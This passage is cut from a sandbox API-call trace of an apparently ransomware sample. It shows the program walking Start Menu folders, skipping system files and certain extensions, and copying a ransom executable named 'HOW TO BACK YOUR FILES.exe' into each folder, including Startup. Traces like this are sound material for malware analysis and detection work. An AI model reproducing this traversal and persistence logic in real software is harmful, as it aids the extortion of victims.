lpString1="Accessories") returned="Accessories" [0040.559] SetFileAttributesW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories", dwFileAttributes=0x10) returned 1 [0040.572] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2480 [0040.572] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6c) returned 0x2cb938 [0040.572] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2488 | out: ListHead=0x2e77d0, ListEntry=0x2d2488) returned 0x2d2468 [0040.572] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrative Tools", cAlternateFileName="ADMINI~1")) returned 1 [0040.572] lstrcmpiW (lpString1="Administrative Tools", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.572] lstrcmpiW (lpString1="Administrative Tools", lpString2="aoldtz.exe") returned -1 [0040.572] lstrcmpiW (lpString1="Administrative Tools", lpString2=".") returned 1 [0040.572] lstrcmpiW (lpString1="Administrative Tools", lpString2="..") returned 1 [0040.572] lstrcmpiW (lpString1="Administrative Tools", lpString2="windows") returned -1 [0040.572] lstrcmpiW (lpString1="Administrative Tools", lpString2="bootmgr") returned -1 [0040.572] lstrcmpiW (lpString1="Administrative Tools", lpString2="temp") returned -1 [0040.572] lstrcmpiW (lpString1="Administrative Tools", lpString2="pagefile.sys") returned -1 [0040.572] lstrcmpiW (lpString1="Administrative Tools", lpString2="boot") returned -1 [0040.572] lstrcmpiW (lpString1="Administrative Tools", lpString2="ids.txt") returned -1 [0040.572] lstrcmpiW (lpString1="Administrative Tools", lpString2="ntuser.dat") returned -1 [0040.573] lstrcmpiW (lpString1="Administrative Tools", lpString2="perflogs") returned -1 [0040.573] lstrcmpiW (lpString1="Administrative Tools", lpString2="MSBuild") returned -1 [0040.573] lstrlenW (lpString="Administrative Tools") returned 20 [0040.573] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories") returned 53 [0040.573] lstrcpyW (in: lpString1=0x2e2e8b4, lpString2="Administrative Tools" | out: lpString1="Administrative Tools") returned="Administrative Tools" [0040.573] SetFileAttributesW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Administrative Tools", dwFileAttributes=0x10) returned 1 [0040.573] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d24c0 [0040.573] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2effc8 [0040.573] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d24c8 | out: ListHead=0x2e77d0, ListEntry=0x2d24c8) returned 0x2d2488 [0040.573] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1dc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.573] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.573] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0040.573] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0040.573] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0040.573] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0040.573] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0040.573] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0040.573] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0040.573] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0040.573] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0040.574] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0040.574] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0040.574] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0040.574] lstrlenW (lpString="desktop.ini") returned 11 [0040.574] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Administrative Tools") returned 62 [0040.574] lstrcpyW (in: lpString1=0x2e2e8b4, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0040.574] lstrlenW (lpString="desktop.ini") returned 11 [0040.574] lstrlenW (lpString="Ares865") returned 7 [0040.574] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.574] lstrlenW (lpString=".dll") returned 4 [0040.574] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0040.574] lstrlenW (lpString=".lnk") returned 4 [0040.574] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0040.574] lstrlenW (lpString=".ini") returned 4 [0040.574] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0040.574] lstrlenW (lpString=".sys") returned 4 [0040.574] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0040.574] lstrlenW (lpString="desktop.ini") returned 11 [0040.574] lstrcpyW (in: lpString1=0x2e2e8b4, lpString2="Internet Explorer (64-bit).lnk" | out: lpString1="Internet Explorer (64-bit).lnk") returned="Internet Explorer (64-bit).lnk" [0040.574] lstrlenW (lpString="Internet Explorer (64-bit).lnk") returned 30 [0040.574] lstrlenW (lpString="Ares865") returned 7 [0040.574] lstrcmpiW (lpString1="it).lnk", lpString2="Ares865") returned 1 [0040.574] lstrlenW (lpString=".dll") returned 4 [0040.574] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2=".dll") returned 1 [0040.574] lstrlenW (lpString=".lnk") returned 4 [0040.574] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2=".lnk") returned 1 [0040.574] lstrlenW (lpString=".ini") returned 4 [0040.574] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2=".ini") returned 1 [0040.574] lstrlenW (lpString=".sys") returned 4 [0040.574] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2=".sys") returned 1 [0040.574] lstrlenW (lpString="Internet Explorer (64-bit).lnk") returned 30 [0040.575] lstrcpyW (in: lpString1=0x2e2e8b4, lpString2="Internet Explorer.lnk" | out: lpString1="Internet Explorer.lnk") returned="Internet Explorer.lnk" [0040.575] lstrlenW (lpString="Internet Explorer.lnk") returned 21 [0040.575] lstrlenW (lpString="Ares865") returned 7 [0040.575] lstrcmpiW (lpString1="rer.lnk", lpString2="Ares865") returned 1 [0040.575] lstrlenW (lpString=".dll") returned 4 [0040.575] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2=".dll") returned 1 [0040.575] lstrlenW (lpString=".lnk") returned 4 [0040.575] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2=".lnk") returned 1 [0040.575] lstrlenW (lpString=".ini") returned 4 [0040.575] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2=".ini") returned 1 [0040.575] lstrlenW (lpString=".sys") returned 4 [0040.575] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2=".sys") returned 1 [0040.575] lstrlenW (lpString="Internet Explorer.lnk") returned 21 [0040.575] lstrcpyW (in: lpString1=0x2e2e8b4, lpString2="Maintenance" | out: lpString1="Maintenance") returned="Maintenance" [0040.575] SetFileAttributesW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance", dwFileAttributes=0x10) returned 1 [0040.575] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d24e0 [0040.575] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6c) returned 0x2cb310 [0040.575] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d24e8 | out: ListHead=0x2e77d0, ListEntry=0x2d24e8) returned 0x2d24c8 [0040.575] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Startup", cAlternateFileName="")) returned 1 [0040.575] lstrcmpiW (lpString1="Startup", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.575] lstrcmpiW (lpString1="Startup", lpString2="aoldtz.exe") returned 1 [0040.575] lstrcmpiW (lpString1="Startup", lpString2=".") returned 1 [0040.575] lstrcmpiW (lpString1="Startup", lpString2="..") returned 1 [0040.576] lstrcmpiW (lpString1="Startup", lpString2="windows") returned -1 [0040.576] lstrcmpiW (lpString1="Startup", lpString2="bootmgr") returned 1 [0040.576] lstrcmpiW (lpString1="Startup", lpString2="temp") returned -1 [0040.576] lstrcmpiW (lpString1="Startup", lpString2="pagefile.sys") returned 1 [0040.576] lstrcmpiW (lpString1="Startup", lpString2="boot") returned 1 [0040.576] lstrcmpiW (lpString1="Startup", lpString2="ids.txt") returned 1 [0040.576] lstrcmpiW (lpString1="Startup", lpString2="ntuser.dat") returned 1 [0040.576] lstrcmpiW (lpString1="Startup", lpString2="perflogs") returned 1 [0040.576] lstrcmpiW (lpString1="Startup", lpString2="MSBuild") returned 1 [0040.576] lstrlenW (lpString="Startup") returned 7 [0040.576] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance") returned 53 [0040.576] lstrcpyW (in: lpString1=0x2e2e8b4, lpString2="Startup" | out: lpString1="Startup") returned="Startup" [0040.576] SetFileAttributesW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Startup", dwFileAttributes=0x10) returned 1 [0040.576] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2500 [0040.576] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x64) returned 0x2cb388 [0040.576] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2508 | out: ListHead=0x2e77d0, ListEntry=0x2d2508) returned 0x2d24e8 [0040.576] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Startup", cAlternateFileName="")) returned 0 [0040.576] FindClose (in: hFindFile=0x2ccfa8 | out: hFindFile=0x2ccfa8) returned 1 [0040.576] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2508 [0040.576] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Start Menu\\Programs\\Startup", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs\\Startup") returned="C:\\Users\\Default User\\Start Menu\\Programs\\Startup" [0040.576] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb388 | out: hHeap=0x2b0000) returned 1 [0040.576] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2500 | out: hHeap=0x2b0000) returned 1 [0040.576] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Startup") returned 49 [0040.577] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Start Menu\\Programs\\Startup" | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs\\Startup") returned="C:\\Users\\Default User\\Start Menu\\Programs\\Startup" [0040.577] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.577] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Startup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\start menu\\programs\\startup\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.581] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.581] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Startup\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x49d25ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49d25ee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.581] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.581] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.581] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0040.581] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x49d25ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49d25ee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.581] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.581] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0040.581] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0040.581] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0040.581] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.581] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.581] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0040.581] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0040.581] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0040.581] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0040.581] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0040.581] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0040.581] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0040.581] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0040.582] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0040.582] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0040.582] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0040.582] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0040.582] lstrlenW (lpString="desktop.ini") returned 11 [0040.582] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Startup\\*") returned 51 [0040.582] lstrcpyW (in: lpString1=0x2e2e8c4, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0040.582] lstrlenW (lpString="desktop.ini") returned 11 [0040.582] lstrlenW (lpString="Ares865") returned 7 [0040.582] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.582] lstrlenW (lpString=".dll") returned 4 [0040.582] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0040.582] lstrlenW (lpString=".lnk") returned 4 [0040.582] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0040.582] lstrlenW (lpString=".ini") returned 4 [0040.582] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0040.582] lstrlenW (lpString=".sys") returned 4 [0040.582] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0040.582] lstrlenW (lpString="desktop.ini") returned 11 [0040.582] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance") returned="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance" [0040.582] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0040.582] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24e0 | out: hHeap=0x2b0000) returned 1 [0040.582] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance") returned 53 [0040.582] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance" | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance") returned="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance" [0040.582] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.582] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\start menu\\programs\\maintenance\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.587] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.587] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49d25ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49d25ee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.587] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.587] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.587] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0040.587] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49d25ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49d25ee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.587] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.587] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0040.587] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0040.587] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0040.587] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xec165d69, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e05e94e, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x13e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0040.587] lstrcmpiW (lpString1="Desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.587] lstrcmpiW (lpString1="Desktop.ini", lpString2="aoldtz.exe") returned 1 [0040.587] lstrcmpiW (lpString1="Desktop.ini", lpString2=".") returned 1 [0040.587] lstrcmpiW (lpString1="Desktop.ini", lpString2="..") returned 1 [0040.587] lstrcmpiW (lpString1="Desktop.ini", lpString2="windows") returned -1 [0040.587] lstrcmpiW (lpString1="Desktop.ini", lpString2="bootmgr") returned 1 [0040.587] lstrcmpiW (lpString1="Desktop.ini", lpString2="temp") returned -1 [0040.587] lstrcmpiW (lpString1="Desktop.ini", lpString2="pagefile.sys") returned -1 [0040.587] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot") returned 1 [0040.587] lstrcmpiW (lpString1="Desktop.ini", lpString2="ids.txt") returned -1 [0040.587] lstrcmpiW (lpString1="Desktop.ini", lpString2="ntuser.dat") returned -1 [0040.588] lstrcmpiW (lpString1="Desktop.ini", lpString2="perflogs") returned -1 [0040.588] lstrcmpiW (lpString1="Desktop.ini", lpString2="MSBuild") returned -1 [0040.588] lstrlenW (lpString="Desktop.ini") returned 11 [0040.588] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance\\*") returned 55 [0040.588] lstrcpyW (in: lpString1=0x2e2e8cc, lpString2="Desktop.ini" | out: lpString1="Desktop.ini") returned="Desktop.ini" [0040.588] lstrlenW (lpString="Desktop.ini") returned 11 [0040.588] lstrlenW (lpString="Ares865") returned 7 [0040.588] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.588] lstrlenW (lpString=".dll") returned 4 [0040.588] lstrcmpiW (lpString1="Desktop.ini", lpString2=".dll") returned 1 [0040.588] lstrlenW (lpString=".lnk") returned 4 [0040.588] lstrcmpiW (lpString1="Desktop.ini", lpString2=".lnk") returned 1 [0040.588] lstrlenW (lpString=".ini") returned 4 [0040.588] lstrcmpiW (lpString1="Desktop.ini", lpString2=".ini") returned 1 [0040.588] lstrlenW (lpString=".sys") returned 4 [0040.588] lstrcmpiW (lpString1="Desktop.ini", lpString2=".sys") returned 1 [0040.588] lstrlenW (lpString="Desktop.ini") returned 11 [0040.588] lstrcpyW (in: lpString1=0x2e2e8cc, lpString2="Help.lnk" | out: lpString1="Help.lnk") returned="Help.lnk" [0040.588] lstrlenW (lpString="Help.lnk") returned 8 [0040.588] lstrlenW (lpString="Ares865") returned 7 [0040.588] lstrcmpiW (lpString1="elp.lnk", lpString2="Ares865") returned 1 [0040.588] lstrlenW (lpString=".dll") returned 4 [0040.588] lstrcmpiW (lpString1="Help.lnk", lpString2=".dll") returned 1 [0040.588] lstrlenW (lpString=".lnk") returned 4 [0040.588] lstrcmpiW (lpString1="Help.lnk", lpString2=".lnk") returned 1 [0040.588] lstrlenW (lpString=".ini") returned 4 [0040.588] lstrcmpiW (lpString1="Help.lnk", lpString2=".ini") returned 1 [0040.588] lstrlenW (lpString=".sys") returned 4 [0040.588] lstrcmpiW (lpString1="Help.lnk", lpString2=".sys") returned 1 [0040.588] lstrlenW (lpString="Help.lnk") returned 8 [0040.589] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Start Menu\\Programs\\Administrative Tools", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs\\Administrative Tools") returned="C:\\Users\\Default User\\Start Menu\\Programs\\Administrative Tools" [0040.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0040.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24c0 | out: hHeap=0x2b0000) returned 1 [0040.589] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Administrative Tools") returned 62 [0040.589] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Start Menu\\Programs\\Administrative Tools" | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs\\Administrative Tools") returned="C:\\Users\\Default User\\Start Menu\\Programs\\Administrative Tools" [0040.589] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.589] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Administrative Tools\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\start menu\\programs\\administrative tools\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.593] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.593] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Administrative Tools\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x49d4c040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49d4c040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.593] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.593] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.593] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0040.593] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x49d4c040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49d4c040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.593] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.593] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0040.593] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0040.593] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0040.593] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, 